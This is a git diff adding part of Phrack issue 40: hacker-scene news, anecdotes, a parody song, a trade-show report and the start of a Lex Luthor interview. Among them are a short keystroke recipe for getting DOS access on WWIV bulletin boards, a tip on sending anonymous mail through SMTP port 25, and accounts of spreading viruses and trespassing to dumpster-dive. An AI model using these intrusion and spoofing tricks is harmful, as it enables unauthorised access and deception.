+It seems there is a move afoot in the anti-virus community to rid the world of
+bulletin board systems that disseminate viruses openly and freely.  The anti-
+virus professionals believe that they must "defend the world" from this type of
+activity.  Even though during a recent conference in Washington, D.C., it was
+disclosed that an anti-virus researcher recently uploaded three (3) viruses
+onto a virus BBS (Hell Pit).  Why was this done?  To "expose the fact that the
+sysop was not as careful as he claims to be."  The person that did this was
+then able to download viruses which was against the policy the sysop claimed
+was in place (of course this statement is based upon the integrity of the anti-
+virus community and their integrity is obviously suspect).
+
+So, the anti-virus community set-up this sysop and made an example of him in a
+national conference without allowing him the opportunity to defend himself.  In
+fact, the sysop may still be totally unaware that this event has even occurred,
+until now that is.
+
+These anti-virus researchers were openly exchanging copies of viruses for
+"research purposes only."  It seems okay for them to disseminate viruses in the
+name of research because of their self-proclaimed importance in the anti-virus
+community, but others that threaten their elite (NOT!) status are subject to be
+framed and have examples made of them.
+
+
+ Do As I Say, Not As I Do
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+This type of activity raises a very interesting question.  Who gives private
+sector computer security employees or consultants carte blanche to conduct this
+type of activity?  Especially when they have the gall to turn around and label
+hackers as criminals for doing the exact same thing.  The answer is not who,
+but what; money and ego.  Perhaps the most frightening aspect of this whole
+situation is that the true battle being fought here is not over viruses and
+bulletin board systems, but instead the free dissemination of information.  For
+a group of individuals so immersed in this world, there is a profound ignorance
+of the concepts of First Amendment rights.
+
+Phrack Magazine is ready to stand tall and vigorously keep a close watch and
+defend against any incursion of these rights.  We've been around a long time,
+we know where the bodies are buried, our legion of followers and readers have
+their eyes and ears open all across the country.  Those of you in the security
+industry be warned because every time you slip up, we will be there to expose
+you.
+
+Dispater
+_______________________________________________________________________________
+
+ Tim Foley Virus
+ ~~~~~~~~~~~~~~~
+ By Guido Sanchez
+
+Right after I moved from 512 to 708, I had the misfortune to realize that Steve
+Jackson Games, a company whose games I readily buy and play, had a BBS up in my
+home town called the Illuminati BBS.  This was my misfortune as I could have
+called it locally in Texas, but now instead had to spend my phone bill on it
+from Illinois.
+
+A good year after the Secret Service assault of Steve Jackson Games, after most
+of the "evidence" was returned with nifty little green stickers on it, a text
+file was put up on the BBS called FOLEY.TXT, a simple copy of the lawsuit that
+Steve Jackson Games had filed against the government, also known as
+JACKSUIT.TXT, distributed by the EFF I believe.
+
+[Editor's Note:  We have been unable to confirm that EFF ever released a file
+                 called JACKSUIT.TXT, however details of the EFF's
+                 participation in the Steve Jackson Games lawsuit can be found
+                 in EFFector Online 1.04.]
+
+It was called FOLEY.TXT obviously because of Timothy Foley, a big-shot
+government guy [actually an agent for the U.S. Secret Service] who is one of
+the defendants in the case. I downloaded the file, and zipped it into a file
+called, surprisingly enough, FOLEY.ZIP.
+
+Within the next week, I was gleefully spreading information as usual, and
+uploaded the FOLEY.ZIP file along with a batch of viral files to a local BBS
+with a beginning virus base.  The theory here is to spread viruses about,
+accessible to all so that wonderful little Anti-Viral programmers cannot
+succeed.
+
+Unfortunately, the FOLEY.ZIP file was put into the viral file base, and before
+I could warn the sysop to move it into the appropriate file base, about 8 lame
+warezwolves had downloaded it and by the end of the week it was widely spread
+around the 708 NPA.
+
+The moral of this story?  None really, it's just an amusing vignette of what
+can happen when people become involved in the intense bartering of information
+that takes place via modem, and can get ridiculed if they're not sure of their
+commodity.  That's all this huge business is, everyone is a courier.  Whether
+they're pirated files, adult files, sound files, viruses, or text files; 90% of
+the time they're just downloaded from one 1.2 gig board and uploaded to the
+next one for more credits to download more files, etc.
+
+It's a great big cycle, just like life.  So, to risk sounding cliche, my rally
+to all is this: "Slow down! Sit back and pick the roses, eat them, digest them,
+and eventually <hopefully> excrete them!"  Mr. Warhol, my fifteen minutes are
+up.  The soapbox is now free.
+_______________________________________________________________________________
+
+ The Hacker Files                                                 June 22, 1992
+ ~~~~~~~~~~~~~~~~
+ By Barbara E. McMullen & John F. McMullen (Newsbytes)
+
+NEW YORK -- DC Comics has announced the introduction of a new twelve-issue
+series, "The Hacker Files."  DC spokesperson Martha Thomases said that the
+first issue will ship on June 23rd.
+
+The series, created by science fiction author Lewis Shiner, deals with the
+adventures of "super-hacker" Jack Marshall who, prior to the events chronicled
+in the series, unjustly lost his job at Digitronix and now operates as a free-
+lance consultant.
+
+The first story line, covering the first four issues of the series, deals with
+Marshall's attempt to uncover those responsible for jamming ARPANET (Network of
+Advanced Research Projects Agency) and causing NORAD's Space Surveillance
+Center inside Cheyenne Mountain, Wyoming to malfunction, bringing the United
+States to the brink of nuclear war.
+
+In the course of his investigation, Marshall, AKA "Hacker," is assisted by a
+number of members of the hacker community -- "Master Blaster," "Sue Denim," and
+"Spider" (Master Blaster, whose real name is Mikey is a student at New York
+City's Bronx High School of Science).
+
+Fiction comes close to reality when it appears that the person responsible for
+the virus that caused the damage is Roger P. Sylvester, a student at Columbia
+University and the son of a high ranking official at the National Security
+Agency (NSA); on November 2, 1988 Robert T. Morris, Jr., a Cornell student and
+son of NSA's chief computer scientist, caused the crippling of the Internet
+through his release of the "Internet Worm."
+
+Shiner told Newsbytes, "The similarity of the characters was, of course done
+intentionally -- you might even note the somewhat subtle connection of the
+names: 'Sylvester The Cat' and 'Morris The Cat.'  I did it partially to show
+those somewhat knowledgeable about computers that the plot was not made out of
+whole cloth but was the result of a good deal of research."
+
+Shiner continued, "When reading comics, I look for information density and I
+tried to make the Hacker Files rich in that regard.  I'm hoping to attract some
+computer-literate young people to comics -- comics were one of the earliest
+forms of expression to make great use of computers and I hope, with the Hacker
+Files, to involve more computer types in the medium."
+
+Shiner also told Newsbytes that his experience as a programmer with a small
+Dallas software firm provided him with an ongoing interest in computer and
+communications technology.  He added, "The firm was sold to EDS (Electronic
+Data Services), Ross Perot's firm, and, with long hair and jeans, I didn't fit
+into the EDS mold so I left and concentrated on writing."
+_______________________________________________________________________________
+
+ "Sneakers" by Universal Pictures                                 June 24, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from PR Newswire
+
+                  Follow A Team of High-Tech Security Experts
+                   Into The Complex World of Computer Crime
+
+"I was trying to break into Protovision.  I wanted to get the programs for
+their new games." -- David Lightman (Matthew Broderick, "WarGames").
+
+"The world isn't run by weapons anymore, or energy or money.  It's run by
+little ones and zeros.  Little bits of data.  It's all just electrons." --
+Cosmo (Ben Kingsley, "Sneakers").
+
+In 1984, screenwriters Walter F. Parkes and Lawrence Lasker received an Academy
+Award nomination for their script which followed the adventures of a young high
+school hacker (Matthew Broderick) whose computer made contact with the
+mainframe computers at North American Air Defense Command (NORAD).
+
+A critical and box office success, "WarGames" was the first major motion
+picture to explore the emerging worlds of computer games, hacking, crashing and
+data piracy.  It soon found a legion of fans who had also discovered the vast
+frontiers available through their personal computer.
+
+Eight years later, Parkes and Lasker along with writer-director Phil Alden
+Robinson ("Field of Dreams") have collaborated on "Sneakers," a Universal
+Pictures release which follows a team of high-tech security experts into the
+complex world of computer crime.  The caper film, directed by Robinson, stars
+Robert Redford, Dan Aykroyd, Ben Kingsley, River Phoenix, Sidney Poitier, David
+Strathairn, James Earl Jones, and Mary McDonnell.
+
+Parkes and Lasker first heard the term "sneakers" at a computer convention in
+1981 as a nickname for IBM's kid programmers.  Months later, they met the
+editor of a small computer magazine who had a very different definition of the
+word.  "Sneakers," their source explained, is a term that is synonymous with
+"black hatters" and "tiger teams," or individuals who are hired to break into
+places in order to test the security of the installation.
+
+Teaming up with Robinson, the trio wrote the basic outline of a story about a
+team of sneakers whose questionable pasts had brought them together.  Robinson
+then embarked on some extensive research, but what had begun as basic fact-
+finding about computer outlaws soon evolved into clandestine meetings with
+underground hackers, FBI men, cryptologists, wire tappers, professional
+penetrators and an endless stream of cyberpunks who were the pioneers in system
+break-ins.
+
+The "Sneakers" research led to meetings with numerous characters, ranging from
+the notorious Captain Crunch (John Draper) to renowned mathematician Leonard
+Adelman, called the father of public-key encryption.  Using computer
+encryption as a plot device, the writers were able to concoct an intricate
+"what if" story which explored the possibility of a "black box" that could
+potentially crack the code of any electronic information in the world.
+
+"'Sneakers' has to do with a new age... the information age," said Redford.
+"It's quite possible that a war in the future will be a war of information.
+Whoever has it, wins."
+
+Coming to theaters this September.
+_______________________________________________________________________________
+
+ Pirates v. AT&T: Posters
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ Special thanks to Legacy Irreverent and Captain Picard
+
+On May 24 1992, two lone pirates, Legacy (of CyberPunk System) and Captain
+Picard (of Holodeck) had finally had enough of AT&T.  Together, they traveled
+to the AT&T Maintenance Facility (just west of Goddard, Kansas) and claimed the
+property in the name of pirates and hackers everywhere.
+
+They hoisted the Jolly Roger skull and crossbones high on the AT&T flagpole,
+where it stayed for two days until it was taken down by security.
+
+This event was photographed and videotaped by EGATOBAS Productions, to preserve
+this landmark in history.  And now you can witness the event.  For a limited
+time they are offering full color posters and t-shirts of the Jolly Roger
+Pirate flag flying high over AT&T, with the AT&T logo in plain view, with the
+caption; "WE CAME, WE SAW, WE CONQUERED."
+
+Prices:  11" x 17" Full Color poster........................... $ 7.00 US
+         20" x 30" Full Color poster                            $20.00 US
+         T-shirts                                               $20.00 US
+
+If you are interested in purchasing, simply send check or money order for the
+amount, plus $1.00 US for postage and handling to:
+
+CyberPunk System
+P.O. Box 771027
+Wichita, KS  67277-1072
+
+Be sure to specify size on T-shirt.
+
+A GIF of this is also available from CyberPunk System, 1:291/19, 23:316/0,
+72:708/316, 69:2316/0.  FREQ magicname PIRATE
+_______________________________________________________________________________
+
+ Telco Trashing Yields Big Rewards                                July 20, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Anonymous
+
+A few days ago, I was faced with a decision about what to do that fine evening:
+Try and make amends with my girlfriend or go dumpster diving down at the Bell
+Central Office.  Well I guess I am a true lamer since I opted for the telco,
+but my choice did not go unrewarded as I found a nice little treasure.
+
+The building is a old 1940's brick place with almost no security whatsoever,
+not even a guard on Sunday nights.  So, it was no problem to jump the barbed
+wire fence that surrounded the truck lot where the dumpster was located.  After
+rooting around through the dumpster for something worth my while, I came across
+a medium sized box that apparently had been used by one of the employees for
+moving since written on the were the words "pots and pans, kitchen."
+
+Naturally intrigued by this strange box in a telco dumpster, I opened it and
+found quite a surprise!  There, staring up at me, was a binder with a label
+stuck on it that read "Phrack 23."  Inside I found the entire collection of
+Phrack 1-39, Informatik 1-4, and LOD/H Technical Journals 1 and 2 (apparently
+they were too cheap to print out the rest).  They were poorly printed on a
+laser printer (or well printed on a ink jet), but they were much better than
+the cheesy job I had done printing out mine.  :-)
+
+Apparently someone at the telco is a phreaker that infiltrated the ranks of
+South Central Bell or they have been reading up on the latest and greatest in
+the phreaker/hacker community.
+
+Perhaps not as valuable as a list of COSMOS passwords or dialups, but still it
+was quite a find.
+_______________________________________________________________________________
+
+ Anonymous Mail On IBM VM Systems?
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Date: Tue, 28 Apr 92 14:54:58 EST
+From: Apollo
+Subject: Anonymous Mail
+To: Phrack Staff
+
+Dear Phrack Staff,
+     I was reading a past Phrack issue and noticed that you can send anonymous
+mail from a UNIX system.  I know that there is a way to send it from a VM
+system.  However, the people at my node don't want anonymous mail sent, so they
+do not tell us how it's done. Can someone PLEASE tell me how I can send
+anonymous mail via a VM system?
+
+-- Apollo --
+
+From: Mind Mage
+Subject: Anonymous Mail
+To: Apollo
+
+I assume that you know you can telnet to any VM system on the Internet and send
+anonymous mail using port 25 and a commands that are very similar to that of
+the UNIX SMTP.
+
+If you want to send it from your particular system, you can try telneting to
+port 25 of your own machine and doing it from there.
+
+Mind Mage
+_______________________________________________________________________________
+
+ WWIV Link Hack
+ ~~~~~~~~~~~~~~
+ By Mr. Bigg (Rebel-*-Jedi)
+
+Not that many people care but here is a nice little trick I happened to come
+across and feel like sharing.
+
+Hack for WWIV Systems Using Multi-Net v1.0 Mod
+Usually used for LinkNet
+
+Main Login: @-!NETWORK!-@ 
+Link Login: 1 (or whoever is sysop)
+//edit config.dat
+find system password in file
+abort editing
+//dos
+enter system password
+
+
+Viola, access to Dos :)
+
+Lamely enough there is no password.  Check for users when using this mod.
+_______________________________________________________________________________
+
+ The Day Bell System Died
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ Sung to the tune of American Pie (with apologies to Don McLean)
+
+Long, long, time ago,
+I can still remember,
+When the local calls were "free".
+And I knew if I paid my bill,
+And never wished them any ill,
+That the phone company would let me be...
+
+But Uncle Sam said he knew better,
+Split 'em up, for all and ever!
+We'll foster competition:
+It's good capital-ism!
+
+I can't remember if I cried,
+When my phone bill first tripled in size.
+But something touched me deep inside,
+The day... Bell System... died.
+
+And we were singing...
+
+Bye, bye, Ma Bell, why did you die?
+We get static from Sprint and echo from MCI,
+"Our local calls have us in hock!" we all cry.
+Oh Ma Bell why did you have to die?
+Ma Bell why did you have to die?
+
+Is your office Step by Step,
+Or have you gotten some Crossbar yet?
+Everybody used to ask...
+Oh, is TSPS coming soon?
+IDDD will be a boon!
+And, I hope to get a Touch-Tone phone, real soon...
+
+The color phones are really neat,
+And direct dialing can't be beat!
+My area code is "low":
+The prestige way to go!
+
+Oh, they just raised phone booths to a dime!
+Well, I suppose it's about time.
+I remember how the payphones chimed,
+The day... Bell System... died.
+
+And we were singing...
+
+Bye, bye, Ma Bell, why did you die?
+We get static from Sprint and echo from MCI,
+"Our local calls have us in hock!" we all cry.
+Oh Ma Bell why did you have to die?
+Ma Bell why did you have to die?
+
+Back then we were all at one rate,
+Phone installs didn't cause debate,
+About who'd put which wire where...
+Installers came right out to you,
+No "phone stores" with their ballyhoo,
+And 411 was free, seemed very fair!
+
+But FCC wanted it seems,
+To let others skim long-distance creams,
+No matter 'bout the locals,
+They're mostly all just yokels!
+
+And so one day it came to pass,
+That the great Bell System did collapse,
+In rubble now, we all do mass,
+The day... Bell System... died.
+
+So bye, bye, Ma Bell, why did you die?
+We get static from Sprint and echo from MCI,
+"Our local calls have us in hock!" we all cry.
+Oh Ma Bell why did you have to die?
+Ma Bell why did you have to die?
+
+I drove on out to Murray Hill,
+To see Bell Labs, some time to kill,
+But the sign there said the Labs were gone.
+I went back to my old CO,
+Where I'd had my phone lines, years ago,
+But it was empty, dark, and ever so forlorn...
+
+No relays pulsed,
+No data crooned,
+No MF tones did play their tunes,
+There wasn't a word spoken,
+All carrier paths were broken...
+
+And so that's how it all occurred,
+Microwave horns just nests for birds,
+Everything became so absurd,
+The day... Bell System... died.
+
+So bye, bye, Ma Bell, why did you die?
+We get static from Sprint and echo from MCI,
+"Our local calls have us in hock!" we all cry.
+Oh Ma Bell why did you have to die?
+Ma Bell why did you have to die?
+
+We were singing:
+
+Bye, bye, Ma Bell, why did you die?
+We get static from Sprint and echo from MCI,
+"Our local calls have us in hock!" we all cry.
+Oh Ma Bell why did you have to die?
+_______________________________________________________________________________
+
+ The 1992 Consumer Electronics Show
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Sarlo
+
+The Consumer Electronic Show is the annual event held in Chicago, Illinois,
+that gives a sneak peek at the electronic products to come to market, as well
+as products that are currently on the market.
+
+The show is usually closed to the public.  This year however, for a MEASLY $10
+fee, the common shmoe can waltz his ignorant ass right up to the door, get a
+green stamp on his hand, and walk up to several displays, oohing and ahhhing,
+and gape like landed fish at the wonderous booths set up by various
+participating companies such as AT&T, most major bell companies, IBM, Prodigy,
+dozens of cellular manufacturers, Nintendo, Sega, and more software producers
+than I really have the patience to list.
+
+I take a taxi to the McCormick center, a convention haven, and enter through
+the underground entrance.  I walk down the nondescript hallway, noting that for
+a center that is supposed to be housing the latest in the future technology,
+nothing was that awe-inspiring.  Expecting a lame show with shoddy video
+graphics, I purchased my ticket, got my hand stamped and entered the doors.
+
+Into an enormous room, filling my senses with an array of Lights and Sound.
+You could almost smell the silicon as I made my way down the aisle displaying
+the giant Phillips Digital Compact Cassettes screen.  Not being a huge fan of
+stereo equipment, I head over to the Sharp Electronics Display.  It was a turn
+in the right direction, as it brought me face to face with one of the clearest
+and, per the name, sharpest video displays I have seen in my life.  Their LCD
+big-screen televisions, displaying a aquarium scene.  Even close up, distortion
+of the images were at a minimum.  Along the north wall, a smaller, gutted
+version of the LCD display was shown, giving electronics buffs a firsthand look
+at the inner workings of the viewscreens.  Turning a corner, I came face to
+face with their dual-projection wallscreen television.  Instead of ghost images
+and a fuzzy, indistinct picture, I found that it may have very well be the
+highest quality video projection system I have ever come in contact with.
+
+ Cellular Mania
+ ~~~~~~~~~~~~~~
+The highlight of the Cellular Phone section was the Motorola Cordless/Cellular
+display area with a large sign showing the spokesperson for Motorola, the eye-
+catching slogan above him:
+
+                 "Cordless Phone Eavesdroppers Are Everywhere."
+
+Immediately catching my interest, I wandered over to check out the smaller
+print:
+
+"But with my Motorola Secure Clear (tm) Cordless Phone, my private
+conversations stay private."
+
+Secure Clear, as the literature explains it, is an exclusive technology that
+assures you that no eavesdroppers will be able to use another cordless phone,
+scanner or baby monitor to listen to your cordless conversations.
+
+As most of us know, security codes and multi-channels don't always prevent
+eavesdropping.  With the latest technology these days, security codes, one of
+65,000 possible codes that are randomly assigned every time you set the handset
+into the base, keeps someone from using your phone base as an outgoing
+phoneline.
+
+Using the Auto Channel Scan (ACS), the Secure Clear Cordless Phones
+automatically skip any channels that register noise or interference.  Three
+guesses what Sarlo is getting himself for Christmas.
+
+For more information on this or any other Motorola product, call their Consumer
+Products Division at (800)331-6456.
+
+On other notes, Technophone had a wide variety of cellular accessories,
+including a Desk stand, spare batteries, an in-car charger, a new life of
+antennae, QuickCharge AC chargers, and a hands-free unit for safe operation in
+a car.
+
+Omni Cellular had one of their Model "A" V833k Portable Hand-Helds open for a
+demonstration, giving a static-free conversation with one of the salesmen.
+Many of the features of this phone were:
+
+        o 90 Minutes of Talk Time
+        o 10 hours of Stand-by Time.
+        o and a sturdy design built right here in the USA.
+
+Other features included Auto-Power Shutoff, Electronic Lock, 50 number memory,
+and signal strength indicator.
+
+
+ East Building Hipster Hi-Jinx
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Growing bored, I headed over to the map.  Searching it, I found, almost
+literally, my green light.  On their illuminated map display, the green section
+of the map beamed out to me.
+
+"Computers"
+
+Hauling ass to the door, stopping for a quick inspection of my bags by the
+security guard, I strolled over to the east building (purchasing a way-keen
+CES-92 T-Shirt along the way), I burst into the building with a renewed vigor.
+
+Right smack-dab in the front of the entrance there is the awful stench of men
+in business suits and cheap computer services.  Right away, I knew I had found
+the Prodigy display.
+
+With free trials and the salesmen prodding the consumers to subscribe to their
+system, I decided to take a look.
+
+"Where else can you get such a great service, allowing you access to such a
+wide variety of things such as an online message service, up-to-date news, an
+online encyclopedia, and thousands of interesting users, people just like
+yourselves?"  The Online-Conman peddled his wares to the unsuspecting
+consumers, not only misinforming them as to think that Prodigy is a useful
+service at all, but to actually have the gall to shove a PS/1 in their faces
+and tell them it's a quality computer.
+
+"Umm... what about any Public Access Unix Site with an Internet or Usenet
+feed," I asked.  The clod then got on his high-horse and addressed me.
+
+"Perhaps.  But most Public Unix's, or bulletin boards, for that matter don't
+have high-quality graphics to accompany the information."  The man had
+definitely done his homework.  But apparently IBM and Sears soaped the man's
+brains out thoroughly enough to the point where he actually bought the bull
+that they were forcing down peoples throats.
+
+"Yea," I said.  "But most public access sites don't waste a quarter of your
+screen space with worthless advertisements.  I wasn't aware that pretty
+pictures made the news or messages any more informative, either.  But I might
+also point out that they don't charge you a extra amount of money for every
+message over the 30th one, read your mail or censor your public posts, or, many
+times, even charge you a fee at all, other than possibly an optional
+subscription fee, around $50 a YEAR at most, nor do they have small datafiles
+that collects information from the fat table from the subscribers."  As I was
+speaking, the salesman was trying to interrupt me, finally succeeding at this
+point.
+
+"Well, I can see you have a lot of questions," the salesman evades rather well.
+"So I'm sure this gentleman over here will be glad to answer any of your
+questions, while I can take this lady's question...Yes?"
+
+I was approached by another salesman who asked me what questions I needed
+answered.  I said none, seeing as I didn't have much interest in his system
+anyhow, and that I was just seeing how good the Prodigy salespeople worked
+under pressure.  He said he would be glad to answer any questions I had, but if
+I were only there to harass people, to please take it elsewhere.
+
+Then it was off to the various other setups.  Magazines were on display and
+free for the taking here, including Mobile Office, Various Nintendo/Game System
+magazines, and Audio Equipment.  Walking down one of the back isles, I heard a
+bit of conversation that caught my ears.
+
+ Star Trek Straight To Your Home
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+"Computer.  Recognize Picard, Jean-Luc.  Kitchen Lights ON, Turn ON the VCR and
+hit RECORD.  Close the Curtains, and turn on the Extasy Channel.  Prepare to
+record "Chicks with Dicks."
+                                - Jean Luc Picard
+                                  Stardate 1992.4, 2:45 A.M.
+
+Such a Scenario is something you would think you could find only on Star Trek,
+right?  Wrong.  With the Mastervoice, the "Ultimate in Home Automation", the
+mastervoice is much like your own personal butler, telling the correct time,
+activating and operating any device in your household, and even with it's own
+alarm system.  All of this, at the command of your voice.
+
+Mastervoice can be designed to be used by up to four people, can be trained in
+any language.  It distinguishes who is speaking, obeys the commands, but also
+speaks back to you -- in a HUMAN sounding voice.  Male or Female.  You can add
+or delete voices from it's recognition systems, you can also create new
+response words as well.
+
+Featuring control over lights, stereo, TV, coffee maker, heating and cooling
+systems.  It also has a Household Noise Override that allows you to have stupid
+children racing around your home in an obnoxious manner without disturbing the
+unit.
+
+Plus, it is also a speakerphone/telephone with stored numbers.  At the sound of
+your voice, it will dial or answer incoming calls and allow you to carry on a
+conversation without ever having to touch the system.  It also interfaces with
+your PC for memory storage or control operations.
+
+Built in infrared sensor and intrusion detection systems are another highlight
+of this demonstration.  As it recognizes up to four voices, you can assign a
+password for each voice, being anything from "I am home" to
+"Supercalafragilisticexpialidoshes".  If all fails, it can call the police for
+you.  Nutty as all hell.
+
+Mastervoice operates thru carrier current modules.  This model, as one of the
+top of the line voice-recognition home-use systems, it is up there in the
+$4,000 plus range, but seeing all the stuff it does, it's well worth the price.
+
+Skipping the Game Module Section (Nintendo/Sega/TurboGraphix/etc) entirely, I
+ran into an interesting palmtop known as the Psion Series 3, and their new
+interlink software. Windows Compatable, the palmtop not only has communication
+software for a link between your PC and Palmtop, but also will support standard
+Hayes and Hayes compatible modems.  Sporting a qwerty style keyboard and a
+romcard port, 128k and a 40 column screen, the Series 3 may be limited, but
+provides an acceptable amount of access to other online services.  Though for
+now, a Windows based software package is only available, at the time of this
+writing, there will be DOS and UNIX compatible packages available to the public
+in 5 to 6 months.
diff --git a/phrack40/3.txt b/phrack40/3.txt
new file mode 100644
index 0000000..f879496
--- /dev/null
+++ b/phrack40/3.txt
@@ -0,0 +1,678 @@
+                                ==Phrack Inc.==
+
+                     Volume Four, Issue Forty, File 3 of 14
+
+                              ==Phrack Pro-Phile==
+
+                    Written and Created by Taran King (1986)
+
+     Welcome to Phrack Pro-Phile.  Phrack Pro-Phile is created to bring info to
+you, the users, about old or highly important/controversial people.  This
+month, I bring you perhaps the most famous all underground hackers and the
+founder of the Legion of Doom.
+
+                                   Lex Luthor
+_______________________________________________________________________________
+
+ Personal
+ ~~~~~~~~
+       Handle:  Lex Luthor
+      Call me:  I really no longer identify with "Lex Luthor" and don't ever
+                expect me to use the handle again with regards to calling
+                boards so you CAN call me "Johnson."
+ Past handles:  I was too status conscious to have more than one handle.  All
+                my effort went into just one persona.
+Handle origin:  From the Superfriends/Justice League of America (ABC TV)
+                cartoon series where the Legion of Doom (LOD) kicked their
+                asses until the series writers thought up some lame way for
+                them to win, but of course, LOD always escaped to fight another
+                day.
+Date of Birth:  You should know better than that.
+       Height:  You should know better that that.
+       Weight:  Approximately 610 Newtons plus or minus a few.
+    Eye color:  With or without colored contact lenses?
+   Hair color:  With or without my wig disguise?
+     Computer:  Apple //+ collecting dust and a soon to be obsolete IBM 286.
+Email address:  lex@stormking.com
+
+
+ The Interview Of Lex Luthor!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Taran King
+
+TK = Taran King
+LL = Lex Luthor
+
+TK:  So Lex, why have you finally relented to a Pro-Phile/interview when I have
+     been after you to do one for about 5 years now?
+
+LL:  Well, I have to admit that I am still reluctant.  This whole issue of
+     computer security/insecurity, hacking/phreaking, philes/electronic
+     publishing, etc. is still quite controversial and I would prefer to
+     concentrate on strictly legitimate activities.  Especially areas where the
+     importance of opinions are negligible and the importance of facts are
+     paramount, as in Science and Engineering.  However, I realize that Phrack
+     won't be around forever, so I thought that if I had any last words left to
+     say I'd better say it now so here I am.
+
+TK:  How did you get started into hacking/phreaking?
+
+LL:  It was easy. I had a delicious shake for breakfast, one for lunch and oh
+     sorry.  No really, it WAS easy.  I had a friend who bought an Apple and I
+     used to go over to his house and watch him play Ultima I, a fantasy/
+     adventure game.  After drooling over Ultima long enough, I took all my
+     savings and bought a system, which was in excess of $1000 at the time.
+     Being penniless, I had nothing else to do but learn the machine.  My
+     friend then purchased a modem and started calling boards.  I followed
+     suit. He was interested in cracking software and became rather well known
+     using the handle "The Punk".  After he gave me some codes for various LD
+     companies I started calling around.  A short while later, I noticed that
+     there were boards, sections of boards, and most importantly INFORMATION
+     that I was not permitted to use/see.  I was unhappy about being excluded
+     especially from RACS III (Tuc eventually came around though) and took it
+     upon myself to learn what was involved in accessing these systems and
+     getting more information.  I realized as most have, that providing
+     information that others do not possess allowed me to be noticed and
+     therefore gain more information.  By the way, I still play Ultima, I
+     BOUGHT Ultima VI two years ago but am just getting around to playing it
+     now.
+
+TK:  What was more important to you, getting noticed or getting information?
+
+LL:  The information was undoubtedly the goal.  I realize now, as many hackers
+     and phreaks have in retrospect, that I am an INFORMATION JUNKIE.  The
+     notoriety was simply the means to be trusted with more information and
+     knowledge.  Unfortunately back then I was unaware that most of the
+     information that I seeked was available LEGALLY.  I was blinded by the
+     information itself, and did not concentrate on the *methods of obtaining
+     information*.  Now with the advent of CD rom databases, and also online
+     databases, the information is readily found.  The problem is that the
+     service providers are pricing the disks and online time out of the reach
+     of common people, which of course puts me back to square one in a way.
+
+TK:  Why do you need information?
+
+LL:  Look, if there is one thing that prevents people from doing things or
+     pursuing their dreams, its INFORMATION.  Not money, not guts, not
+     anything.  With the right information just about everything else can be
+     obtained with the exception of health and happiness I suppose.  
+
+TK:  Give me an example.
+
+LL:  Okay.  If you have ever been up late watching TV and 'ol Dave Del Dotto or
+     Carlton Sheets or whomever gets on and is trying to sell you their
+     "courses" on Real Estate, Buying at Government Auctions, etc. then you
+     know what I am talking about.  These guys made millions simply by
+     obtaining information that the majority of people were not aware of and
+     put it to use, they could have been anybody.
+
+TK:  What types of information do you look for?
+
+LL:  Although I always look to learn new ways of how to obtain information in
+     general, i.e., what new databases are available and how to use them, etc.
+     I am currently concentrating on scientific data since I am working on my
+     Master's Thesis and a comprehensive literature search is required to
+     prevent me from duplicating what has already been accomplished.  The
+     "don't re-invent the wheel" philosophy.
+
+TK:  You mention a thesis, what schooling have you had/are pursuing?
+
+LL:  I don't want to be too specific, however, I have an undergraduate
+     engineering degree and am currently in the process of completing dual
+     Master's degrees, one in Quantum Physics and the other in Engineering.
+
+TK:  Sounds heavy, but why be vague, you must have a computer-type or
+     electrical engineering degree?
+
+LL:  No, and I get that a lot from old friends: "You are so good with
+     computers, why aren't you doing that?"  My interest in computers now is
+     simply to make them calculate equations and do simulations of physical
+     systems.  And to help me get more information.
+
+TK:  Let's get back to the H/P subject, there's a few people who have always
+     contended that you and the guys in LOD really didn't know much of
+     anything, is that true?
+
+LL:  Well I can't speak much about the old members, but their expertise
+     satisfied me and other members (we would usually vote on new members, I
+     wasn't a dictator you know).  As for me, I realized early on that only
+     certain people can be trusted with certain information, and certain types
+     of information can be trusted to no one.  Giving out useful things to
+     irresponsible people would inevitably lead to whatever thing it was being
+     abused and no longer useful.  I was very possessive of my information and
+     frequently withheld things from my articles.  By not providing much data,
+     some people may conclude that I didn't know anything at all.  Its just
+     that I didn't release it to just anyone and that dismayed various people
+     probably to the point of lashing out at me and LOD.
+
+
+ Some People to Mention
+ ~~~~~~~~~~~~~~~~~~~~~~
+Taran King:        You were always hounding me for a Phrack Pro-Phile.  Hope
+                   you are enjoying it.
+
+Knight Lightning:  Great guy, but how did he get so famous even though he never
+                   even broke into the E911 computer?  Sad to see him get
+                   screwed by overzealous "professionals."  Wish I had some
+                   money to donate to his defense fund.
+
+The Blue Archer:   Always wanted to meet him.  I never got a chance to meet him
+                   face to face although I have known him for 8 years.  To be
+                   honest, he was better at getting into systems than I was.
+
+Tuc:               Always willing to bend over backwards to help you out.  I
+                   still use the briefcase he bought me in NYC many years ago.
+
+Paul Muad'Dib:     The one in New York.  He is one of the smartest people I've
+                   ever met.  I hope he is doing something worthwhile.
+
+Bioc Agent 003:    Talked to him quite a number of times and met him at TAP
+                   meetings, but we never got to be friends.
+
+Cheshire Catalyst: I still owe him $20.  He lent it to me in NYC.
+
+Control-C:         A wildman with the women.  I hope he gives me his STARGATE
+                   videogame when he gets tired of it.  I don't play it every
+                   day like him, but I still can kick his ass.
+
+Phantom Phreaker:  He has a spiritual side to him that most people never
+                   realize.
+
+The Videosmith:    A fun person with talent.  I was sad to see him leave the
+                   scene so early.  Met with him in his home state two years
+                   ago just to say hello.
+
+Dr. Who:           Here is a guy who loved hacking and exploring systems.  I
+                   mean he really enjoyed it.  He got quite good at it too.
+
+Telenet Bob:       Met him up in Massachusetts at Dr. Who's conference.
+
+Jester Sluggo:     Met him up in Massachusetts along with The Sprinter.
+                   Obviously he knew more than he let on even way back then.
+
+Compu-Phreak:      I liked listening to his pirate radio station while he
+                   operated it.  The FCC never did catch on.
+
+Silver Spy:        A very smart guy with a future.  Someone who knows when to
+                   stop, but was a little bit panicky at times.
+
+Erik Bloodaxe:     Part of the original LOD group.  I think he always wanted my
